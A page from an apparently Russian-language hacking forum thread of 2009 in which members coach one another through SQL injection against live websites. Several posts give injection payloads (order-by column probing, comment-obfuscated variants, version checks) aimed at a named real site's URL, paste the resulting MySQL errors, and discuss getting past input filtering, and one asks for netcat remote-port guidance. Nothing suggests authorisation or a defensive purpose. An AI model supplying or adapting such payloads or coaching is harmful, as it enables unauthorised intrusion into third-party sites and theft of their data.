Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Здорово конечно, но еще здоровее будет, если будет ссылка
     
  2. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    А если она выводит а я паблик выложу как то не хорошо получится. Закроют и все.
     
    1 person likes this.
  3. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    S0ulVortex
    1%') order by 1/*
    попробуй просто интересно,что ответит
     
    1 person likes this.
  4. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ')%') and (entities.keywords like '%order%' or entities.name li
    Дальше невидно и в исходнике обрывается
    Сразу говарю недавно заметил что это оказывается строка поиска и если в ней ввести ( ' ) вылезает такая ошибка которую я выше писал.
     
  5. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    похоже на то что после 1') ничего в запрос не пошло, може после пробыла все режеться, попробуй
    1%')/**/order/**/by/**/1/*
     
  6. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'order/**/by/**/1/*%' or entities.description like '%1%')/**/ord
    Вот че выводит
     
  7. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Возможно что тот запрос в котором ошибка вставляеться значения из другого запроса или это переменая вставляеться несколько раз, но самое плохое судя по ответу почему то что не проходит финт с коментом /*, то есть остальной запрос не закрываеться(и вполне возможно что запрос многострочный и -- и # не проканает), если бы видеть всю ошибку.
     
  8. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    Да вот я тоже хотел бы увидеть полностью но он режит и в исходнике режит
     
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Ну скинь ты ему ссылку в личку, весь форум потянули при моём даже разрешении
     
    1 person likes this.
  10. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    Народ а че все прицепились к order может есть какие идеи через другое ченють. Может че то с оператором like тут связанно?

    Вот ещё при ( ' order by 1/* ) выводит
    Code:
    You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'order%' or entities.name like '%order%' or entities.description
    Если смотрять концовку то тут видео name like '%order%' or entities.description А в остольных он выводил до name li это по моему и есть продолжение всех выводов заканчивающихся на name li.

    P.s если кто хочет помочь чтобы не ждать и не засорять форум стучите в аську 1106663
     
    #5910 S0ulVortex, 14 Mar 2009
    Last edited: 14 Mar 2009
  11. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Cудя по всему входная переменая которая вставляестся в запрос дробиться по пробелам на составляюшии, да и не узаю ff 3 ветки для sql injection.
     
  12. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    AkyHa_MaTaTa
    походу прав,типо поиск по словам.... если б как-то обрезать запрос дальше...
     
    1 person likes this.
  13. Parserian

    Parserian New Member

    Joined:
    19 Jan 2009
    Messages:
    15
    Likes Received:
    3
    Reputations:
    0
    может кто ткнет в носом с статью в которой расматривается октрытие порта на удаленном сервере, конект к данному порту неткатом. и т..д..
    (зі ткните в меня этим неткатом, поиск дает лишь кмс неткат)

    к сожалению кроме двух видео ничего не нашел.
    спасибо.
     
  14. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    а как тут узнать количество столбцов?
    http://mega-porno.ru/video.php?category=1'
     
  15. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    переменая вставляеться в 2 запроса а потом еще и на оснавании этих зопросов какое то значения вставляеться в 3 запрос(а может дальше еще в один) или например проверка на is_numeric в 3 запросе.
     
    1 person likes this.
  16. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Ты правда думаешь, что это ему что-то даст?

    2TELO:

    Code:
    http://mega-porno.ru/video.php?category=1')+order+by+1--+
    5-ая ветка:

    Code:
    http://mega-porno.ru/video.php?category=1'+and+substring(version(),1,1)='5
     
    2 people like this.
  17. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93

    http://forum.antichat.ru/showpost.php?p=1118647

    Ровно месяц прошел )
     
  18. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Нашёл багу, всё стандартно "You have an error in your SQL syntax",но при подборе столбцов order by вместо Unknown column '100' появляется Unknown column 'foto2' in 'field list'.
    Как быть?
     
    #5918 Imperou$, 15 Mar 2009
    Last edited: 15 Mar 2009
  19. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Скинуть ссылку..
     
    #5919 R1dex, 15 Mar 2009
    Last edited: 15 Mar 2009
    1 person likes this.
  20. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Ничего не получал, отошли ещё раз.
    Скинул в пм.
     
    #5920 Imperou$, 15 Mar 2009
    Last edited: 15 Mar 2009
    1 person likes this.
Thread Status:
Not open for further replies.